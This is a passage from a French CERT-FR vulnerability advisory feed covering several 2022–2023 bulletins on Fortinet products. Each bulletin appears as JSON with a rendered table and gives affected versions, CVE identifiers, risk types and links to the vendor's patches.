"url": "https://www.fortiguard.com/psirt/FG-IR-22-346"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-151"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-391"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-220"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-214"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-118"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-312"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-131"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-163"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-234"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-186"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-014"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-224"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-048"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-257"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-251"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-348"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-265"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-136"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-146"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-142"
}
],
"reference": "CERTFR-2023-AVI-0146",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2023-02-17T00:00:00.000000"
}
],
"risks": [
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 corrig\u00e9es dans \u003cspan\nclass=\"textit\"\u003eles produits Fortinet\u003c/span\u003e. Certaines d\u0027entre elles\npermettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire\n\u00e0 distance, un contournement de la politique de s\u00e9curit\u00e9 et une atteinte\n\u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es.\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Fortinet",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-166 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-460 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-046 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-280 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-273 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-251 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-312 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-014 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-362 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-300 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-214 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-391 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-164 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-430 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-146 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-131 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-157 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-265 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-234 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-118 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-348 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-187 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-220 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-260 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-167 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-151 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-346 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-111 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-080 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-133 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-304 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-329 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-142 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-163 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-048 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-186 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-257 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-126 du 16 f\u00e9vrier 2023",
"url": null
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-136 du 16 f\u00e9vrier 2023",
"url": null
}
]
}
CERTFR-2022-AVI-701
Vulnerability from certfr_avis - Published: 2022-08-03 - Updated: 2022-08-03
De multiples vulnérabilités ont été découvertes dans les produits Fortinet. Elles permettent à un attaquant de provoquer une exécution de code arbitraire, un contournement de la politique de sécurité et une atteinte à la confidentialité des données.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Fortinet | FortiMail | FortiMail versions 7.0.x antérieures à 7.0.3 | ||
| Fortinet | FortiADC | FortiADC versions 7.x antérieures à 7.0.1 | ||
| Fortinet | FortiOS | FortiOS versions 7.0.x antérieures à 7.0.4 | ||
| Fortinet | FortiProxy | FortiProxy versions 7.0.x antérieures à 7.0.2 | ||
| Fortinet | FortiProxy | FortiProxy versions 2.0.x antérieures à 2.0.8 | ||
| Fortinet | FortiGate | FortiGate versions 6.4.x antérieures à 6.4.9 | ||
| Fortinet | FortiGate | FortiGate versions 7.0.x antérieures à 7.0.6 | ||
| Fortinet | FortiADC | FortiADC versions antérieures à 6.2.4 | ||
| Fortinet | FortiOS | FortiOS versions 6.2.x antérieures à 6.2.11 | ||
| Fortinet | FortiOS | FortiOS versions 6.0.x antérieures à 6.0.15 | ||
| Fortinet | FortiOS | FortiOS versions 6.4.x antérieures à 6.4.9 | ||
| Fortinet | FortiMail | FortiMail versions 6.4.x antérieures à 6.4.6 | ||
| Fortinet | FortiGate | FortiGate versions 7.2.x antérieures à 7.2.0 | ||
| Fortinet | FortiMail | FortiMail versions 7.2.x antérieures à 7.2.0 |
References
| Title | Publication Time | Tags | |||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "FortiMail versions 7.0.x ant\u00e9rieures \u00e0 7.0.3",
"product": {
"name": "FortiMail",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiADC versions 7.x ant\u00e9rieures \u00e0 7.0.1",
"product": {
"name": "FortiADC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 7.0.x ant\u00e9rieures \u00e0 7.0.4",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiProxy versions 7.0.x ant\u00e9rieures \u00e0 7.0.2",
"product": {
"name": "FortiProxy",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiProxy versions 2.0.x ant\u00e9rieures \u00e0 2.0.8",
"product": {
"name": "FortiProxy",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions 6.4.x ant\u00e9rieures \u00e0 6.4.9",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions 7.0.x ant\u00e9rieures \u00e0 7.0.6",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiADC versions ant\u00e9rieures \u00e0 6.2.4",
"product": {
"name": "FortiADC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 6.2.x ant\u00e9rieures \u00e0 6.2.11",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 6.0.x ant\u00e9rieures \u00e0 6.0.15",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 6.4.x ant\u00e9rieures \u00e0 6.4.9",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiMail versions 6.4.x ant\u00e9rieures \u00e0 6.4.6",
"product": {
"name": "FortiMail",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions 7.2.x ant\u00e9rieures \u00e0 7.2.0",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiMail versions 7.2.x ant\u00e9rieures \u00e0 7.2.0",
"product": {
"name": "FortiMail",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2022-22299",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-22299"
},
{
"name": "CVE-2022-27484",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27484"
},
{
"name": "CVE-2022-23442",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23442"
}
],
"initial_release_date": "2022-08-03T00:00:00",
"last_revision_date": "2022-08-03T00:00:00",
"links": [],
"reference": "CERTFR-2022-AVI-701",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2022-08-03T00:00:00.000000"
}
],
"risks": [
{
"description": "Ex\u00e9cution de code arbitraire"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits\nFortinet. Elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de\ncode arbitraire, un contournement de la politique de s\u00e9curit\u00e9 et une\natteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Fortinet",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-036 du 02 ao\u00fbt 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-036"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-055 du 02 ao\u00fbt 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-055"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-235 du 02 ao\u00fbt 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-235"
}
]
}
CERTFR-2022-AVI-613
Vulnerability from certfr_avis - Published: 2022-07-06 - Updated: 2022-07-06
De multiples vulnérabilités ont été découvertes dans les produits Fortinet. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Fortinet | FortiOS | FortiOS versions 6.x antérieures à 6.2.11 | ||
| Fortinet | FortiEDR Central Manager | FortiEDR Central Manager versions 5.1.x antérieures à 5.2.0 | ||
| Fortinet | FortiManager | FortiManager versions 7.0.x antérieures à 7.0.4 | ||
| Fortinet | FortiSwitch | FortiSwitch versions 7.0.x antérieures à 7.0.3 | ||
| Fortinet | FortiNAC | FortiNAC versions antérieures à 9.1.6 | ||
| Fortinet | FortiManager | FortiManager versions 6.x antérieures à 6.4.8 | ||
| Fortinet | FortiEDR Central Manager | FortiEDR Central Manager version 5.1.0 | ||
| Fortinet | N/A | FortiClientWindows versions 7.0.x antérieures à 7.0.3 | ||
| Fortinet | FortiRecorder | FortiRecorder versions antérieures à 6.0.11 | ||
| Fortinet | FortiEDR Central Manager | FortiEDR Central Manager versions 5.0.x antérieures à 5.0.3 Patch 7 | ||
| Fortinet | FortiProxy | FortiProxy versions 7.0.x antérieures à 7.0.1 | ||
| Fortinet | FortiRecorder | FortiRecorder versions antérieures à 6.4.3 | ||
| Fortinet | FortiADC | FortiADC versions 7.0.x antérieures à 7.0.2 | ||
| Fortinet | FortiADC | FortiADC versions antérieures à 6.2.3 | ||
| Fortinet | FortiOS | FortiOS versions 7.0.x antérieures à 7.0.6 | ||
| Fortinet | FortiAnalyzer | FortiAnalyzer versions 7.0.x antérieures à 7.0.4 | ||
| Fortinet | N/A | FortiVoiceEnterprise versions 6.4.x antérieures à 6.4.4 | ||
| Fortinet | FortiDeceptor | FortiDeceptor versions antérieures à 3.3.3 | ||
| Fortinet | FortiSwitch | FortiSwitch versions antérieures à 6.4.10 | ||
| Fortinet | N/A | FortiClientWindows versions 6.x antérieures à 6.4.7 | ||
| Fortinet | FortiOS | FortiOS versions 6.4.x antérieures à 6.4.9 | ||
| Fortinet | N/A | FortiVoiceEnterprise versions antérieures à 6.0.11 | ||
| Fortinet | FortiNAC | FortiNAC versions 9.2.x antérieures à 9.2.4 | ||
| Fortinet | FortiProxy | FortiProxy versions antérieures à 2.0.9 | ||
| Fortinet | FortiDeceptor | FortiDeceptor versions 4.0.x antérieures à 4.0.2 | ||
| Fortinet | FortiGate | FortiGate versions antérieures à 7.0.6 | ||
| Fortinet | FortiAnalyzer | FortiAnalyzer versions 6.x antérieures à 6.4.8 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "FortiOS versions 6.x ant\u00e9rieures \u00e0 6.2.11",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiEDR Central Manager versions 5.1.x ant\u00e9rieures \u00e0 5.2.0",
"product": {
"name": "FortiEDR Central Manager",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiManager versions 7.0.x ant\u00e9rieures \u00e0 7.0.4",
"product": {
"name": "FortiManager",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSwitch versions 7.0.x ant\u00e9rieures \u00e0 7.0.3",
"product": {
"name": "FortiSwitch",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiNAC versions ant\u00e9rieures \u00e0 9.1.6",
"product": {
"name": "FortiNAC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiManager versions 6.x ant\u00e9rieures \u00e0 6.4.8",
"product": {
"name": "FortiManager",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiEDR Central Manager version 5.1.0",
"product": {
"name": "FortiEDR Central Manager",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiClientWindows versions 7.0.x ant\u00e9rieures \u00e0 7.0.3",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiRecorder versions ant\u00e9rieures \u00e0 6.0.11",
"product": {
"name": "FortiRecorder",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiEDR Central Manager versions 5.0.x ant\u00e9rieures \u00e0 5.0.3 Patch 7",
"product": {
"name": "FortiEDR Central Manager",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiProxy versions 7.0.x ant\u00e9rieures \u00e0 7.0.1",
"product": {
"name": "FortiProxy",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiRecorder versions ant\u00e9rieures \u00e0 6.4.3",
"product": {
"name": "FortiRecorder",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiADC versions 7.0.x ant\u00e9rieures \u00e0 7.0.2",
"product": {
"name": "FortiADC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiADC versions ant\u00e9rieures \u00e0 6.2.3",
"product": {
"name": "FortiADC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 7.0.x ant\u00e9rieures \u00e0 7.0.6",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiAnalyzer versions 7.0.x ant\u00e9rieures \u00e0 7.0.4",
"product": {
"name": "FortiAnalyzer",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiVoiceEnterprise versions 6.4.x ant\u00e9rieures \u00e0 6.4.4",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiDeceptor versions ant\u00e9rieures \u00e0 3.3.3",
"product": {
"name": "FortiDeceptor",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSwitch versions ant\u00e9rieures \u00e0 6.4.10",
"product": {
"name": "FortiSwitch",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiClientWindows versions 6.x ant\u00e9rieures \u00e0 6.4.7",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 6.4.x ant\u00e9rieures \u00e0 6.4.9",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiVoiceEnterprise versions ant\u00e9rieures \u00e0 6.0.11",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiNAC versions 9.2.x ant\u00e9rieures \u00e0 9.2.4",
"product": {
"name": "FortiNAC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiProxy versions ant\u00e9rieures \u00e0 2.0.9",
"product": {
"name": "FortiProxy",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiDeceptor versions 4.0.x ant\u00e9rieures \u00e0 4.0.2",
"product": {
"name": "FortiDeceptor",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions ant\u00e9rieures \u00e0 7.0.6",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiAnalyzer versions 6.x ant\u00e9rieures \u00e0 6.4.8",
"product": {
"name": "FortiAnalyzer",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2021-42755",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-42755"
},
{
"name": "CVE-2021-44170",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44170"
},
{
"name": "CVE-2021-43072",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43072"
},
{
"name": "CVE-2022-26117",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26117"
},
{
"name": "CVE-2022-30302",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30302"
},
{
"name": "CVE-2022-29057",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29057"
},
{
"name": "CVE-2022-26118",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26118"
},
{
"name": "CVE-2022-27483",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27483"
},
{
"name": "CVE-2021-41031",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41031"
},
{
"name": "CVE-2022-26120",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26120"
},
{
"name": "CVE-2022-23438",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23438"
}
],
"initial_release_date": "2022-07-06T00:00:00",
"last_revision_date": "2022-07-06T00:00:00",
"links": [],
"reference": "CERTFR-2022-AVI-613",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2022-07-06T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits\nFortinet. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer\nune ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0\ndistance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Fortinet",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-155 du 05 juillet 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-155"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-051 du 05 juillet 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-051"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-057 du 05 juillet 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-057"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-056 du 05 juillet 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-056"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-213 du 05 juillet 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-213"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-190 du 05 juillet 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-190"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-179 du 05 juillet 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-179"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-058 du 05 juillet 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-058"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-049 du 05 juillet 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-049"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-077 du 05 juillet 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-077"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-206 du 05 juillet 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-206"
}
]
}
CERTFR-2022-AVI-410
Vulnerability from certfr_avis - Published: 2022-05-04 - Updated: 2022-05-04
De multiples vulnérabilités ont été découvertes dans les produits Fortinet. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et un contournement de la politique de sécurité.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Fortinet | FortiNAC | Fortinet FortiNAC versions 9.2.x antérieures à 9.2.3 | ||
| Fortinet | FortiNAC | Fortinet FortiNAC versions 9.4.x antérieures à 9.4.0 | ||
| Fortinet | FortiGate | Fortinet FortiGate versions 7.0.x antérieures à 7.0.4 | ||
| Fortinet | N/A | Fortinet FortiIsolator versions antérieures à 2.3.3 ou 2.4.0 | ||
| Fortinet | FortiProxy | Fortinet FortiProxy versions 2.0.x antérieures à 2.0.8 | ||
